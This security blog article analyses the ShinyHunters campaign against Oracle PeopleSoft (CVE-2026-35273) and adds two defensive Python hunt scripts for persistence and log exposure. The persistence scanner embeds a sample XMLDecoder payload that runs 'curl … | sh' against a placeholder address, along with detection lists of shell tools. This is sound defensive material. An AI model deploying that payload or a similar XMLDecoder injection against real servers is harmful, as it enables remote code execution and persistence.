June 16, 2026
How ShinyHunters Exploited Oracle PeopleSoft: A Deep Dive Into Zero-Day Logic Flaws
When a Zero-Day lands on your ERP backend
Lakshya Porwal
6 min read
Imagine showing up to work and finding that your enterprise resource planning (ERP) platform, the system holding your most sensitive internal records, has been quietly exposed to the internet. That is close to what happened here. The ShinyHunters extortion crew (tracked by Mandiant as UNC6240) spent almost two weeks targeting organizations through an unpatched zero-day in Oracle PeopleSoft.
The issue is tracked as CVE-2026-35273 and sits in the top severity tier with a CVSS score of 9.8/10. The unsettling part: the attackers needed no login, no active session, and no user interaction. Any organization with the PeopleSoft Environment Management Hub reachable from the public internet was effectively handing over the keys to the server.
The campaign hit higher education networks especially hard. Dozens of universities reportedly woke up to find alumni and student data dumped on cybercrime leak sites. It is one more reminder that, while teams are busy locking down cloud apps, older on-premises enterprise software remains a prime target for skilled extortion crews.
How the BREACH actually happened: The Attack Anatomy
Thanks to an operational blunder on the attacker side, we have an unusually detailed view of how the campaign played out. The ShinyHunters crew made a classic operational security mistake: they left their own staging servers exposed to the open internet. A security researcher spotted open Python-based HTTP directory listings on port 8888 and called it out publicly. When Mandiant investigated, they found the crew's full attack toolkit sitting in the open, as if laid out for inspection.
The command history showed a coordinated, automated attack pipeline; the chain was clearly choreographed:
- Initial Foothold: The attackers used the zero-day to gain access to the PeopleSoft server through the unauthenticated web path.
- Deployment: They then dropped MeshCentral remote management agents onto the system, renamed to look like legitimate Microsoft Azure binaries so as not to trip local security alarms.
- Lateral Movement: Next they ran a script named [victim]_fanout.sh. It scraped internal system configuration files for active hostnames, then automatically sprayed a hardcoded set of common usernames and passwords over SSH to compromise other internal servers.
- Exfiltration: With access to the data, the group used the zstd utility to compress huge database dumps, then quietly moved the files out over outbound SSH connections to a public mirror that hosted their extortion site. They left behind a very obvious marker file named README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT.
The Technical Vulnerability Explained
To understand why this bug is so dangerous, we have to look at what it targets and how. The vulnerability lives in the Updates Environment Management component that backs the PeopleSoft Environment Management Hub (PSEMHUB). This part of the product monitors environment data and handles software updates across multi-server deployments.
Because PSEMHUB processes incoming remote requests, it listens on specific web paths such as /PSEMHUB/hub and /PSIGW/HttpListeningConnector. The flaw tracked as CVE-2026-35273 lets an attacker send a specially crafted HTTP POST request to these unauthenticated endpoints.
The server processes the malicious payload without validating who sent it or whether they are logged in. That triggers a server-side logic flaw which enables unauthenticated Remote Code Execution (RCE). In practice, the attacker instructs the server to download and execute their own code, and the server complies, no questions asked, with high-level system privileges.
The threat actors then went further to keep their access. They modified configuration XML files located under the web document root's environment metadata path (envmetadata/data/environment). Those files are consumed by XMLDecoder, the Java class that rebuilds objects from XML and can be made to invoke arbitrary methods, so the moment an IT administrator restarted the server the harmful code would spin up again. They also coerced the compromised hosts into making outbound Server Message Block (SMB) connections on port 445, a standard way to capture corporate Windows NetNTLM hashes for offline cracking.
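As an added example (not code from the article, from Mandiant, or from Oracle), here is a small hunt script for that persistence mechanism. It assumes the files under envmetadata/data/environment are java.beans.XMLDecoder documents, which is the format XMLDecoder consumes, so a hostile edit has to spell out a command through classes such as java.lang.ProcessBuilder or java.lang.Runtime. The two sample documents are constructed for the example; the hostname and the 203.0.113.5 address in them are placeholders.

```python
"""Hunt for XMLDecoder-style persistence in PeopleSoft envmetadata XML files.

Added example, not taken from the article, Mandiant or Oracle. Assumptions:
the files under envmetadata/data/environment are java.beans.XMLDecoder
documents, so any hostile edit has to express a command through Java classes
such as java.lang.ProcessBuilder or java.lang.Runtime. The sample documents
below are constructed for this example, not recovered from a real host.
"""
import sys
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

# Classes that have no business appearing in environment metadata.
SUSPICIOUS_CLASSES = {
    "java.lang.ProcessBuilder",
    "java.lang.Runtime",
    "java.net.URL",
    "java.net.URLClassLoader",
    "javax.script.ScriptEngineManager",
}
# Methods XMLDecoder would invoke on such objects to actually run something.
SUSPICIOUS_METHODS = {"exec", "start", "getRuntime", "loadClass", "eval", "newInstance"}
# String literals that look like a command rather than a hostname or a path.
SHELL_MARKERS = ("/bin/sh", "/bin/bash", "cmd.exe", "powershell", "curl ", "wget ")


def scan_xml(text: str) -> list:
    """Return findings for one XMLDecoder document; an empty list means clean."""
    findings = []
    try:
        root = ET.fromstring(text)
    except ET.ParseError as exc:
        # A file that no longer parses is itself worth a look: tampering often breaks it.
        return [f"unparseable XML: {exc}"]
    for el in root.iter():
        cls = el.get("class", "")
        if cls in SUSPICIOUS_CLASSES:
            findings.append(f"<{el.tag}> instantiates {cls}")
        method = el.get("method", "")
        if method in SUSPICIOUS_METHODS:
            findings.append(f"<{el.tag}> calls method {method!r}")
        if el.tag == "string" and el.text and any(m in el.text for m in SHELL_MARKERS):
            findings.append(f"shell-like string literal {el.text.strip()[:60]!r}")
    return findings


def scan_tree(base: Path) -> dict:
    """Walk base recursively; return {relative path: findings} for files that are not clean."""
    hits = {}
    for path in sorted(base.rglob("*.xml")):
        findings = scan_xml(path.read_text(encoding="utf-8", errors="replace"))
        if findings:
            hits[str(path.relative_to(base))] = findings
    return hits


# Constructed sample of a legitimate-looking metadata document (hostname is a placeholder).
BENIGN = """<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0" class="java.beans.XMLDecoder">
 <object class="java.util.HashMap">
  <void method="put">
   <string>hostname</string>
   <string>psapp01.corp.example</string>
  </void>
 </object>
</java>
"""

# Constructed sample of a tampered document: XMLDecoder would build a ProcessBuilder
# and call start() on it every time the file is loaded. 203.0.113.5 is a documentation address.
TAMPERED = """<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0" class="java.beans.XMLDecoder">
 <object class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
   <void index="0"><string>/bin/sh</string></void>
   <void index="1"><string>-c</string></void>
   <void index="2"><string>curl http://203.0.113.5:8888/x | sh</string></void>
  </array>
  <void method="start"/>
 </object>
</java>
"""


if __name__ == "__main__":
    # Point this at the real envmetadata/data/environment directory in production;
    # with no argument it builds a throwaway tree from the two constructed samples.
    if len(sys.argv) > 1:
        root_dir = Path(sys.argv[1])
    else:
        root_dir = Path(tempfile.mkdtemp())
        (root_dir / "env.xml").write_text(BENIGN, encoding="utf-8")
        (root_dir / "env_backup.xml").write_text(TAMPERED, encoding="utf-8")
    for rel, findings in scan_tree(root_dir).items():
        print(f"[!] {rel}")
        for finding in findings:
            print(f"    {finding}")
```

Run it against a copy of the directory taken from a forensic image rather than the live host, and compare the file list and timestamps against a known-good install: a legitimate metadata document only ever builds collection and property-holder objects, so any java.lang or java.net class in these files is a finding on its own, whatever the string literals say.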
WHY It Matters: The Business and Reputational Fallout
When an enterprise-grade backend gets hit, the fallout is not a short-lived IT inconvenience. Mandiant had to notify more than 100 organizations that their environments were actively exposed or compromised during this sprint.
Higher education took the hardest hit, accounting for 68% of the target list. The University of Nottingham is one example, among the earliest publicly confirmed victims of this zero-day activity.
The breach notification service Have I Been Pwned later indexed a leaked dataset tied to the campaign containing about 455,000 distinct email addresses of current students and alumni. It was not a bare list of names and contacts, either: the compromised data included home addresses, phone numbers, passport numbers, and sensitive attributes such as ethnicity and documented disabilities. For any organization, leaking personal data at this level means reputational damage, regulatory fines, and broken user trust.
The Compliance Angle: Perimeter Controls Are Non-Negotiable!
This situation highlights why modern compliance frameworks are so strict about managing public-facing infrastructure. You can have excellent internal security policies, but if a legacy web application endpoint is left dangling on the open web without a strict audit trail, your whole perimeter is effectively compromised.
This incident shows exactly why frameworks like ISO/IEC 27001 put such heavy emphasis on access control, vulnerability management, and continuous technical testing. Under ISO 27001, organizations are expected to identify operational risks and systematically harden any system that touches corporate or customer data. Leaving a management hub like PSEMHUB wide open to the public without restrictive firewall rules is a fast track to failing an audit.
Similarly, for financial and banking institutions operating under regional frameworks such as the RBI IS Audit Guidelines, perimeter integrity is non-negotiable. These guidelines require that core solutions, ERP databases, and web-facing middleware undergo routine, rigorous security reviews. The point of these audits is to catch unauthenticated pathways and configuration mistakes before an extortion group finds them.
Mitigation and Defense: HOW to Secure Your Environment?
If your organization runs Oracle PeopleSoft, treat this as an active emergency, not a "next quarter" item. Oracle has released patches for PeopleTools 8.61 and 8.62, but because those fixes sit behind a support login, your immediate defense has to lean on mitigation plus active threat hunting.
- Step 1: Lock Down The Perimeter
The first move is to stop outside traffic from reaching the vulnerable component at all.
For a multi-server setup, disable the Environment Management Hub service completely.
For a single-server setup, remove the PSEMHUB application entirely.
If you cannot disable it, block outside web access to /PSEMHUB/* (especially /PSEMHUB/hub) and /PSIGW/HttpListeningConnector at the perimeter firewall.
Note: Mandiant is clear that relying on Web Application Firewall (WAF) body-inspection rules is risky: those rules can be bypassed, leaving you believing you are protected when you are not. Blocking the endpoints outright is the only reliable fix. Restricting those paths should not break normal user sessions, so there is no trade-off here.
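To verify that the perimeter block holds, and to hunt back through history for requests that reached those paths while they were still exposed, here is an added example (my code, not the article's or Mandiant's) that runs over web-tier access logs. It assumes the logs are in the usual NCSA combined format written by the reverse proxy or web server in front of PeopleSoft, and that "internal" means the RFC 1918 ranges listed in INTERNAL_NETS (adjust for your address plan). The log lines are constructed for the example; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.

```python
"""Hunt access logs for requests that reached the PSEMHUB/PSIGW paths from outside.

Added example, not from the article or Mandiant. Assumptions: NCSA combined
log format (the default "combined" layout of Apache and nginx), and that any
address outside INTERNAL_NETS is external. Sample log lines are constructed.
"""
import ipaddress
import re
from collections import Counter
from typing import Optional

# Adjust to your own address plan; RFC 1918 is only a starting point.
INTERNAL_NETS = [
    ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")
]

# The paths the article says must be unreachable from the outside.
BLOCKED_PREFIXES = ("/PSEMHUB/", "/PSIGW/HttpListeningConnector")

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def is_internal(ip: str) -> bool:
    """True for addresses inside INTERNAL_NETS; unparseable addresses count as external."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in INTERNAL_NETS)


def parse_line(line: str) -> Optional[dict]:
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def classify(rec: dict) -> Optional[str]:
    """Verdict for one request, or None if it is not interesting for this hunt.

    EXPOSED         : an external client got a 2xx from a path that should be blocked,
                      i.e. the perimeter rule is missing now or was missing at that time.
    BLOCKED_ATTEMPT : an external client tried and was refused (403/404/...).
    """
    if is_internal(rec["ip"]):
        return None
    if not rec["path"].startswith(BLOCKED_PREFIXES):
        return None
    return "EXPOSED" if 200 <= rec["status"] < 300 else "BLOCKED_ATTEMPT"


def hunt(lines) -> list:
    """Return the interesting records, each with a 'verdict' key, in log order."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        verdict = classify(rec)
        if verdict:
            rec["verdict"] = verdict
            findings.append(rec)
    return findings


def exposed_sources(findings) -> Counter:
    """Count EXPOSED hits per source address: the list you escalate first."""
    return Counter(f["ip"] for f in findings if f["verdict"] == "EXPOSED")


# Constructed sample log. A POST to /PSEMHUB/hub answered 200 to an outside
# address is exactly the open door the article describes.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jun/2026:03:14:07 +0000] "POST /PSEMHUB/hub HTTP/1.1" 200 512 "-" "python-requests/2.31"
203.0.113.7 - - [10/Jun/2026:03:14:09 +0000] "GET /PSIGW/HttpListeningConnector HTTP/1.1" 200 1024 "-" "python-requests/2.31"
10.20.30.40 - - [10/Jun/2026:03:15:00 +0000] "POST /PSEMHUB/hub HTTP/1.1" 200 512 "-" "Java/1.8.0"
198.51.100.9 - - [10/Jun/2026:04:02:11 +0000] "POST /PSEMHUB/hub HTTP/1.1" 403 199 "-" "curl/8.5.0"
203.0.113.7 - - [10/Jun/2026:04:10:45 +0000] "GET /psp/ps/EMPLOYEE/HRMS/h/?tab=DEFAULT HTTP/1.1" 200 8031 "-" "Mozilla/5.0"
this line is not a log entry and is skipped
"""


if __name__ == "__main__":
    results = hunt(SAMPLE_LOG.splitlines())
    for r in results:
        print(f"{r['verdict']:16} {r['ip']:15} {r['method']} {r['path']} -> {r['status']} at {r['ts']}")
    print("sources with EXPOSED hits:", dict(exposed_sources(results)))
```

Feed it the logs from before the block went in as well as after: an EXPOSED hit dated after the firewall change means the rule is not in front of every path to the web tier, and any EXPOSED hit from before it is a host that needs the persistence check, not just the patch.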
- Step 2: Continuous Security Validation
To keep perimeter blind spots from creeping back later, organizations need to move away from purely reactive security. Deploy continuous web application security testing to find concealed application logic issues and unintended open API pathways before they are weaponized.
At the same time, run ongoing network penetration testing. It simulates real-world attacker flows, including the lateral SSH movement reported in this incident, and makes it easier to fix weak internal credentials and tighten exposed settings. Finally, because credentials and data can land on underground markets almost instantly during a zero-day event, integrating a dedicated dark web monitoring engine such as DARKX gives security teams the real-time intelligence they need to track leaked data and shut down compromised sessions before secondary attacks take root.
Key Concepts Explained
- Zero-Day Vulnerability: A security flaw that is exploited by threat actors before the vendor knows about it or has issued a fix.
- Remote Code Execution (RCE): A high-impact attack in which an attacker runs arbitrary commands on a remote host from anywhere on the internet.
- Unauthenticated Endpoint: A web path on a server that does not require the caller to sign in or present credentials.
- Lateral Movement: Techniques attackers use after gaining an initial foothold to widen their access to other internal assets.
- Command-and-Control (C2) Server: A server operated by attackers that sends instructions to compromised machines and collects stolen data in return.
- Indicators of Compromise (IoCs): Artifacts such as file hashes, IP addresses, filenames or log entries left behind by an intrusion that help security teams confirm a breach has taken place.